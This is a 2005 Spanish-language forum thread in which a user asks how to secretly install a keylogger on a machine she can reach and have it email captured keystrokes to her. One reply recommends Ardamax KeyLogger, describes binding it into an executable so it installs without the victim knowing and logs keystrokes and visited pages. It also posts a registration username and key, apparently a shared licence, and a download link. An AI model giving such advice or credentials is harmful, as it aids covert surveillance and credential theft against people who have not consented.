PDA

Ver la versión completa : Alguien me puede guiar!!!! pls



kryronne
22-11-2005, 21:18
Hola muy guenas tardes, ya eh estado revisando el foro y esta muy gueno, muchas felicidades.... quiero saber si alguien me puede ayudar la cuenstion es la sig. quiero instalar un keylogger q mande a mi correo lo q ha capturado, alguien me puede ayudar a hacerlo?? (lo que quiero es q me digan como hacerlo paso a paso y no q me lo hagan, me gusta aprender, pero ya eh intentado yo sola y no mas no doy jejejeje :( y no encontrado alguna pag, q me de el manual o de donde bajarlo) tengo contacto con la máquina a trabajar. ¿como puedo instalarselo? :confused: y q keylogger me recomiendan, de antemano les agradesco su antención y espero q me puedan ayudar

KrakenHimoto
22-11-2005, 23:57
yo utilizoel Ardamax KeyLogger, lo uso xq pesa uno m... 250 kb y se puede meter en un exe q cuando el otro lo usa se le instala el programa en su pc sin q se entere, adema de q registra todo hasta las paginas web q visita, lo unico q lo logre saber bien como era la cosa era justamente lo q preguntas, q mande esa informacion q recaunda a un correo... asiq nose espero q dejen la respuesta asi me ayudan ami tmb en eso :D
por cierto nesesitas el Usuario y contraseña q son
User: KrakenHimoto Pass:OAJPMRWGTVCVYEMP, no me acuerdo si se podia dejar esta info pero en el caso q no se pueda pido perdon y edito, bye

R3D5KULL
23-11-2005, 16:25
Para que pones user y pass si no as puesto el link de la descarga??

KrakenHimoto
23-11-2005, 20:49
tenes razon, el link para descargarlo es,
http://www.uptodown.com/?contenido=descargar&p=1235#